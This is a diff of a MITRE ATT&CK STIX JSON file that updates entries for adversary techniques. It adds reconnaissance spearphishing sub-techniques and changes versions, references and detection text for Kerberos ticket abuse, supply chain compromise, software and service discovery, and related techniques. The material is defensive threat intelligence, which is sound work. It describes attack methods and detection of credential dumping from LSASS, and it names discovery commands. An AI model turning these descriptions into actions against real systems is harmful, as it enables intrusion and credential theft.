"created": "2020-10-02T16:42:17.482Z", + "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "PRE" + ] + }, { "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" @@ -25553,8 +29523,13 @@ "external_references": [ { "source_name": "mitre-attack", - "url": "https://attack.mitre.org/techniques/T1072", - "external_id": "T1072" + "external_id": "T1072", + "url": "https://attack.mitre.org/techniques/T1072" + }, + { + "external_id": "CAPEC-187", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/187.html" } ], "description": "Adversaries may gain access to and use third-party software suites installed within an enterprise network, such as administration, monitoring, and deployment systems, to move laterally through the network. Third-party applications and software deployment systems may be in use in the network environment for administration purposes (e.g., SCCM, VNC, HBSS, Altiris, etc.).\n\nAccess to a third-party network-wide or enterprise-wide software system may enable an adversary to have remote code execution on all systems that are connected to such a system. The access may be used to laterally move to other systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints.\n\nThe permissions required for this action vary by system configuration; local credentials may be sufficient with direct access to the third-party system, or specific domain credentials may be required. However, the system may require an administrative account to log in or to perform it's intended purpose.", @@ -25572,10 +29547,10 @@ "phase_name": "lateral-movement" } ], - "modified": "2020-02-21T16:31:32.789Z", + "modified": "2020-09-16T15:27:01.403Z", "created": "2017-05-31T21:30:57.201Z", "x_mitre_is_subtechnique": false, - "x_mitre_version": "2.0", + "x_mitre_version": "2.1", "x_mitre_data_sources": [ "Authentication logs", "File monitoring", @@ -25604,9 +29579,14 @@ { "external_references": [ { - "external_id": "T1518", "source_name": "mitre-attack", + "external_id": "T1518", "url": "https://attack.mitre.org/techniques/T1518" + }, + { + "external_id": "CAPEC-580", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/580.html" } ], "object_marking_refs": [ @@ -25623,10 +29603,10 @@ "phase_name": "discovery" } ], - "modified": "2020-06-29T19:34:39.136Z", + "modified": "2020-09-16T19:36:17.133Z", "created": "2019-09-16T17:52:44.147Z", "x_mitre_is_subtechnique": false, - "x_mitre_version": "1.1", + "x_mitre_version": "1.2", "x_mitre_permissions_required": [ "User", "Administrator" @@ -25902,7 +29882,7 @@ ], "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "name": "Spearphishing Attachment", - "description": "Adversaries may send spearphishing emails with a malicious attachment in an attempt to elicit sensitive information and/or gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain execution.\n\nThere are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one.", + "description": "Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain execution.\n\nThere are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one.", "id": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597", "type": "attack-pattern", "kill_chain_phases": [ @@ -25911,9 +29891,9 @@ "phase_name": "initial-access" } ], - "modified": "2020-03-27T23:56:40.369Z", + "modified": "2020-10-18T01:52:25.316Z", "created": "2020-03-02T19:05:18.137Z", - "x_mitre_version": "1.0", + "x_mitre_version": "2.0", "x_mitre_is_subtechnique": true, "x_mitre_detection": "Network intrusion detection systems and email gateways can be used to detect spearphishing with malicious attachments in transit. Detonation chambers may also be used to identify malicious attachments. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems.\n\nAnti-virus can potentially detect malicious documents and attachments as they're scanned to be stored on the email server or on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the attachment is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning Powershell.exe) for techniques such as [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203) or usage of malicious scripts.", "x_mitre_data_sources": [ @@ -25930,6 +29910,65 @@ "Linux" ] }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1598.002", + "url": "https://attack.mitre.org/techniques/T1598/002" + }, + { + "source_name": "Sophos Attachment", + "url": "https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/", + "description": "Ducklin, P. (2020, October 2). Serious Security: Phishing without links \u2013 when phishers bring along their own web pages. Retrieved October 20, 2020." + }, + { + "source_name": "GitHub Phishery", + "url": "https://github.com/ryhanson/phishery", + "description": "Ryan Hanson. (2016, September 24). phishery. Retrieved October 23, 2020." + }, + { + "source_name": "Microsoft Anti Spoofing", + "url": "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide", + "description": "Microsoft. (2020, October 13). Anti-spoofing protection in EOP. Retrieved October 19, 2020." + }, + { + "source_name": "ACSC Email Spoofing", + "url": "https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf", + "description": "Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Spearphishing Attachment", + "description": "Before compromising a victim, adversaries may send spearphishing messages with a malicious attachment to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.\n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon the recipient populating information then returning the file.(Citation: Sophos Attachment)(Citation: GitHub Phishery) The text of the spearphishing email usually tries to give a plausible reason why the file should be filled-in, such as a request for information from a business associate. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.", + "id": "attack-pattern--8982a661-d84c-48c0-b4ec-1db29c6cf3bc", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "modified": "2020-10-24T04:12:48.152Z", + "created": "2020-10-02T17:08:57.386Z", + "x_mitre_contributors": [ + "Sebastian Salla, McAfee", + "Robert Simmons, @MalwareUtkonos" + ], + "x_mitre_data_sources": [ + "Mail server", + "Email gateway" + ], + "x_mitre_detection": "Monitor for suspicious email activity, such as numerous accounts receiving messages from a single unusual/unknown sender. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed. Also consider enabling DMARC to verify the sender of emails.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "PRE" + ] + }, { "id": "attack-pattern--20138b9d-1aac-4a26-8654-a36b6bbf2bba", "name": "Spearphishing Link", @@ -25956,17 +29995,8 @@ "created": "2018-04-18T17:59:24.739Z" }, { - "created": "2020-03-02T19:15:44.182Z", - "modified": "2020-03-02T19:44:47.843Z", - "kill_chain_phases": [ - { - "kill_chain_name": "mitre-attack", - "phase_name": "initial-access" - } - ], - "type": "attack-pattern", "id": "attack-pattern--2b742742-28c3-4e1b-bab7-8350d6300fa7", - "description": "Adversaries may send spearphishing emails with a malicious link in an attempt to elicit sensitive information and/or gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. \n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging [User Execution](https://attack.mitre.org/techniques/T1204). The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place. Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly or verify the receipt of an email (i.e. web bugs/web beacons). Links may also direct users to malicious applications designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, in order to gain access to protected applications and information.(Citation: Trend Micro Pawn Storm OAuth 2017)", + "description": "Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. \n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging [User Execution](https://attack.mitre.org/techniques/T1204). The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place. Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly or verify the receipt of an email (i.e. web bugs/web beacons). Links may also direct users to malicious applications designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, in order to gain access to protected applications and information.(Citation: Trend Micro Pawn Storm OAuth 2017)", "name": "Spearphishing Link", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": [ @@ -25989,6 +30019,15 @@ "description": "Hacquebord, F.. (2017, April 25). Pawn Storm Abuses Open Authentication in Advanced Social Engineering Attacks. Retrieved October 4, 2019." } ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "initial-access" + } + ], + "modified": "2020-10-18T01:53:39.818Z", + "created": "2020-03-02T19:15:44.182Z", "x_mitre_platforms": [ "Linux", "macOS", @@ -25998,7 +30037,7 @@ ], "x_mitre_detection": "URL inspection within email (including expanding shortened links) can help detect links leading to known malicious sites. Detonation chambers can be used to detect these links and either automatically go to these sites to determine if they're potentially malicious, or wait and capture the content if a user visits the link.\n\nBecause this technique usually involves user interaction on the endpoint, many of the possible detections take place once [User Execution](https://attack.mitre.org/techniques/T1204) occurs.", "x_mitre_is_subtechnique": true, - "x_mitre_version": "1.0", + "x_mitre_version": "2.0", "x_mitre_data_sources": [ "Packet capture", "Web proxy", @@ -26015,6 +30054,104 @@ "Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC)" ] }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1598.003", + "url": "https://attack.mitre.org/techniques/T1598/003" + }, + { + "source_name": "TrendMictro Phishing", + "url": "https://www.trendmicro.com/en_us/research/20/i/tricky-forms-of-phishing.html", + "description": "Babon, P. (2020, September 3). Tricky 'Forms' of Phishing. Retrieved October 20, 2020." + }, + { + "source_name": "PCMag FakeLogin", + "url": "https://www.pcmag.com/news/hackers-try-to-phish-united-nations-staffers-with-fake-login-pages", + "description": "Kan, M. (2019, October 24). Hackers Try to Phish United Nations Staffers With Fake Login Pages. Retrieved October 20, 2020." + }, + { + "source_name": "Microsoft Anti Spoofing", + "url": "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide", + "description": "Microsoft. (2020, October 13). Anti-spoofing protection in EOP. Retrieved October 19, 2020." + }, + { + "source_name": "ACSC Email Spoofing", + "url": "https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf", + "description": "Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Spearphishing Link", + "description": "Before compromising a victim, adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.\n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, the malicious emails contain links generally accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser.(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin) The given website may closely resemble a legitimate site in appearance and have a URL containing elements from the real site. From the fake website, information is gathered in web forms and sent to the attacker. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.", + "id": "attack-pattern--2d3f5b3c-54ca-4f4d-bb1f-849346d31230", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "modified": "2020-10-24T04:13:12.752Z", + "created": "2020-10-02T17:09:50.723Z", + "x_mitre_contributors": [ + "Sebastian Salla, McAfee", + "Robert Simmons, @MalwareUtkonos" + ], + "x_mitre_data_sources": [ + "Mail server", + "Email gateway" + ], + "x_mitre_detection": "Monitor for suspicious email activity, such as numerous accounts receiving messages from a single unusual/unknown sender. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed. Also consider enabling DMARC to verify the sender of emails.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)\n\nMonitor for references to uncategorized or known-bad sites. URL inspection within email (including expanding shortened links) can also help detect links leading to known malicious sites.", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "PRE" + ] + }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1598.001", + "url": "https://attack.mitre.org/techniques/T1598/001" + }, + { + "source_name": "ThreatPost Social Media Phishing", + "url": "https://threatpost.com/facebook-launching-pad-phishing-attacks/160351/", + "description": "O'Donnell, L. (2020, October 20). Facebook: A Top Launching Pad For Phishing Attacks. Retrieved October 20, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Spearphishing Service", + "description": "Before compromising a victim, adversaries may send spearphishing messages via third-party services to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.\n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services.(Citation: ThreatPost Social Media Phishing) These services are more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target's interest in some way. Adversaries may create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and information about their environment. Adversaries may also use information from previous reconnaissance efforts (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.", + "id": "attack-pattern--f870408c-b1cd-49c7-a5c7-0ef0fc496cc6", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "modified": "2020-10-25T19:44:58.093Z", + "created": "2020-10-02T17:08:07.742Z", + "x_mitre_contributors": [ + "Robert Simmons, @MalwareUtkonos" + ], + "x_mitre_detection": "Monitor social media traffic for suspicious activity, including messages requesting information as well as abnormal file or data transfers (especially those involving unknown, or otherwise suspicious accounts).\n\nMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "PRE" + ] + }, { "id": "attack-pattern--d3df754e-997b-4cf9-97d4-70feb3120847", "name": "Spearphishing via Service", @@ -26053,7 +30190,7 @@ ], "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "name": "Spearphishing via Service", - "description": "Adversaries may send spearphishing messages via third-party services in an attempt to elicit sensitive information and/or gain access to victim systems. Spearphishing via service is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of third party services rather than directly via enterprise email channels. \n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services. These services are more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target's interest in some way. Adversaries will create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and software that's running in an environment. The adversary can then send malicious links or attachments through these services.\n\nA common example is to build rapport with a target via social media, then send content to a personal webmail service that the target uses on their work computer. This allows an adversary to bypass some email restrictions on the work account, and the target is more likely to open the file since it's something they were expecting. If the payload doesn't work as expected, the adversary can continue normal communications and troubleshoot with the target on how to get it working.", + "description": "Adversaries may send spearphishing messages via third-party services in an attempt to gain access to victim systems. Spearphishing via service is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of third party services rather than directly via enterprise email channels. \n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services. These services are more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target's interest in some way. Adversaries will create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and software that's running in an environment. The adversary can then send malicious links or attachments through these services.\n\nA common example is to build rapport with a target via social media, then send content to a personal webmail service that the target uses on their work computer. This allows an adversary to bypass some email restrictions on the work account, and the target is more likely to open the file since it's something they were expecting. If the payload doesn't work as expected, the adversary can continue normal communications and troubleshoot with the target on how to get it working.", "id": "attack-pattern--f6ad61ee-65f3-4bd0-a3f5-2f0accb36317", "type": "attack-pattern", "kill_chain_phases": [ @@ -26062,14 +30199,14 @@ "phase_name": "initial-access" } ], - "modified": "2020-03-28T00:04:46.264Z", + "modified": "2020-10-18T01:55:02.988Z", "created": "2020-03-02T19:24:00.951Z", "x_mitre_data_sources": [ "SSL/TLS inspection", "Anti-virus", "Web proxy" ], - "x_mitre_version": "1.0", + "x_mitre_version": "2.0", "x_mitre_is_subtechnique": true, "x_mitre_detection": "Because most common third-party services used for spearphishing via service leverage TLS encryption, SSL/TLS inspection is generally required to detect the initial communication/delivery. With SSL/TLS inspection intrusion detection signatures or other security gateway appliances may be able to detect malware. \n\nAnti-virus can potentially detect malicious documents and files that are downloaded on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning Powershell.exe) for techniques such as [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203) or usage of malicious scripts.", "x_mitre_platforms": [ @@ -26406,6 +30543,11 @@ "external_id": "T1558", "url": "https://attack.mitre.org/techniques/T1558" }, + { + "external_id": "CAPEC-652", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/652.html" + }, { "source_name": "ADSecurity Kerberos Ring Decoder", "url": "https://adsecurity.org/?p=227", @@ -26461,7 +30603,7 @@ "phase_name": "credential-access" } ], - "modified": "2020-03-31T12:59:11.121Z", + "modified": "2020-09-29T16:16:06.868Z", "created": "2020-02-11T19:12:46.830Z", "x_mitre_system_requirements": [ "Kerberos authentication enabled" @@ -26471,7 +30613,7 @@ "Authentication logs" ], "x_mitre_detection": "Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4672, 4634), RC4 encryption within ticket granting tickets (TGTs), and ticket granting service (TGS) requests without preceding TGT requests.(Citation: ADSecurity Detecting Forged Tickets)(Citation: Stealthbits Detect PtT 2019)(Citation: CERT-EU Golden Ticket Protection)\n\nMonitor the lifetime of TGT tickets for values that differ from the default domain duration.(Citation: Microsoft Kerberos Golden Ticket)\n\nMonitor for indications of [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) being used to move laterally. \n\nEnable Audit Kerberos Service Ticket Operations to log Kerberos TGS service ticket requests. Particularly investigate irregular patterns of activity (ex: accounts making numerous requests, Event ID 4769, within a small time frame, especially if they also request RC4 encryption [Type 0x17]).(Citation: Microsoft Detecting Kerberoasting Feb 2018) (Citation: AdSecurity Cracking Kerberos Dec 2015)\n\nMonitor for unexpected processes interacting with lsass.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as [Mimikatz](https://attack.mitre.org/software/S0002) access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details, including Kerberos tickets, are stored.", - "x_mitre_version": "1.0", + "x_mitre_version": "1.1", "x_mitre_is_subtechnique": false, "x_mitre_platforms": [ "Windows" @@ -26484,6 +30626,11 @@ "external_id": "T1027.003", "url": "https://attack.mitre.org/techniques/T1027/003" }, + { + "external_id": "CAPEC-636", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/636.html" + }, { "url": "https://en.wikipedia.org/wiki/Duqu", "description": "Wikipedia. (2017, December 29). Duqu. Retrieved April 10, 2018.", @@ -26509,9 +30656,9 @@ "phase_name": "defense-evasion" } ], - "modified": "2020-06-08T18:16:48.253Z", + "modified": "2020-09-16T19:24:20.350Z", "created": "2020-02-05T14:28:16.719Z", - "x_mitre_version": "1.0", + "x_mitre_version": "1.1", "x_mitre_is_subtechnique": true, "x_mitre_detection": "Detection of steganography is difficult unless artifacts are left behind by the obfuscation process that are detectable with a known signature. Look for strings are other signatures left in system artifacts related to decoding steganography.", "x_mitre_data_sources": [ @@ -26830,9 +30977,10 @@ ] }, { - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" - ], + "id": "attack-pattern--3f18edba-28f4-4bb9-82c3-8aa60dcac5f7", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Supply Chain Compromise", + "description": "Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise.\n\nSupply chain compromise can take place at any stage of the supply chain including:\n\n* Manipulation of development tools\n* Manipulation of a development environment\n* Manipulation of source code repositories (public or private)\n* Manipulation of source code in open-source dependencies\n* Manipulation of software update/distribution mechanisms\n* Compromised/infected system images (multiple cases of removable media infected at the factory) (Citation: IBM Storwize) (Citation: Schneider Electric USB Malware) \n* Replacement of legitimate software with modified versions\n* Sales of modified/counterfeit products to legitimate distributors\n* Shipment interdiction\n\nWhile supply chain compromise can impact any component of hardware or software, attackers looking to gain execution have often focused on malicious additions to legitimate software in software distribution or update channels. (Citation: Avast CCleaner3 2018) (Citation: Microsoft Dofoil 2018) (Citation: Command Five SK 2011) Targeting may be specific to a desired victim set (Citation: Symantec Elderwood Sept 2012) or malicious software may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. (Citation: Avast CCleaner3 2018) (Citation: Command Five SK 2011) Popular open source projects that are used as dependencies in many applications may also be targeted as a means to add malicious code to users of the dependency. (Citation: Trendmicro NPM Compromise)", "external_references": [ { "source_name": "mitre-attack", @@ -26861,7 +31009,7 @@ }, { "source_name": "Schneider Electric USB Malware", - "url": "https://www.schneider-electric.com/en/download/document/SESN-2018-236-01/", + "url": "https://www.se.com/ww/en/download/document/SESN-2018-236-01/", "description": "Schneider Electric. (2018, August 24). Security Notification \u2013 USB Removable Media Provided With Conext Combox and Conext Battery Monitor. Retrieved May 28, 2019." }, { @@ -26890,10 +31038,9 @@ "description": "Trendmicro. (2018, November 29). Hacker Infects Node.js Package to Steal from Bitcoin Wallets. Retrieved April 10, 2019." } ], - "description": "Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise.\n\nSupply chain compromise can take place at any stage of the supply chain including:\n\n* Manipulation of development tools\n* Manipulation of a development environment\n* Manipulation of source code repositories (public or private)\n* Manipulation of source code in open-source dependencies\n* Manipulation of software update/distribution mechanisms\n* Compromised/infected system images (multiple cases of removable media infected at the factory) (Citation: IBM Storwize) (Citation: Schneider Electric USB Malware) \n* Replacement of legitimate software with modified versions\n* Sales of modified/counterfeit products to legitimate distributors\n* Shipment interdiction\n\nWhile supply chain compromise can impact any component of hardware or software, attackers looking to gain execution have often focused on malicious additions to legitimate software in software distribution or update channels. (Citation: Avast CCleaner3 2018) (Citation: Microsoft Dofoil 2018) (Citation: Command Five SK 2011) Targeting may be specific to a desired victim set (Citation: Symantec Elderwood Sept 2012) or malicious software may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. (Citation: Avast CCleaner3 2018) (Citation: Command Five SK 2011) Popular open source projects that are used as dependencies in many applications may also be targeted as a means to add malicious code to users of the dependency. (Citation: Trendmicro NPM Compromise)", - "name": "Supply Chain Compromise", - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "id": "attack-pattern--3f18edba-28f4-4bb9-82c3-8aa60dcac5f7", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], "type": "attack-pattern", "kill_chain_phases": [ { @@ -26901,23 +31048,23 @@ "phase_name": "initial-access" } ], - "modified": "2020-03-23T12:51:45.574Z", + "modified": "2020-10-13T12:38:32.426Z", "created": "2018-04-18T17:59:24.739Z", - "x_mitre_version": "1.2", - "x_mitre_data_sources": [ - "Web proxy", - "File monitoring" + "x_mitre_is_subtechnique": false, + "x_mitre_contributors": [ + "Veeral Patel" ], - "x_mitre_detection": "Use verification of distributed binaries through hash checking or other integrity checking mechanisms. Scan downloads for malicious signatures and attempt to test software and updates prior to deployment while taking note of potential suspicious activity. Perform physical inspection of hardware to look for potential tampering.", "x_mitre_platforms": [ "Linux", "Windows", "macOS" ], - "x_mitre_contributors": [ - "Veeral Patel" + "x_mitre_detection": "Use verification of distributed binaries through hash checking or other integrity checking mechanisms. Scan downloads for malicious signatures and attempt to test software and updates prior to deployment while taking note of potential suspicious activity. Perform physical inspection of hardware to look for potential tampering.", + "x_mitre_data_sources": [ + "Web proxy", + "File monitoring" ], - "x_mitre_is_subtechnique": false + "x_mitre_version": "1.2" }, { "external_references": [ @@ -27408,10 +31555,18 @@ "x_mitre_is_subtechnique": false }, { - "id": "attack-pattern--322bad5a-1c49-4d23-ab79-76d641794afa", - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "name": "System Service Discovery", - "description": "Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are \"sc,\" \"tasklist /svc\" using [Tasklist](https://attack.mitre.org/software/S0057), and \"net start\" using [Net](https://attack.mitre.org/software/S0039), but adversaries may also use other tools as well. Adversaries may use the information from [System Service Discovery](https://attack.mitre.org/techniques/T1007) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.", + "created": "2017-05-31T21:30:21.315Z", + "modified": "2020-03-15T01:05:08.805Z", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "discovery" + } + ], + "type": "attack-pattern", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], "external_references": [ { "source_name": "mitre-attack", @@ -27424,33 +31579,25 @@ "url": "https://capec.mitre.org/data/definitions/574.html" } ], - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" - ], - "type": "attack-pattern", - "kill_chain_phases": [ - { - "kill_chain_name": "mitre-attack", - "phase_name": "discovery" - } - ], - "modified": "2020-03-15T01:05:08.805Z", - "created": "2017-05-31T21:30:21.315Z", - "x_mitre_is_subtechnique": false, - "x_mitre_platforms": [ - "Windows" + "description": "Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are \"sc,\" \"tasklist /svc\" using [Tasklist](https://attack.mitre.org/software/S0057), and \"net 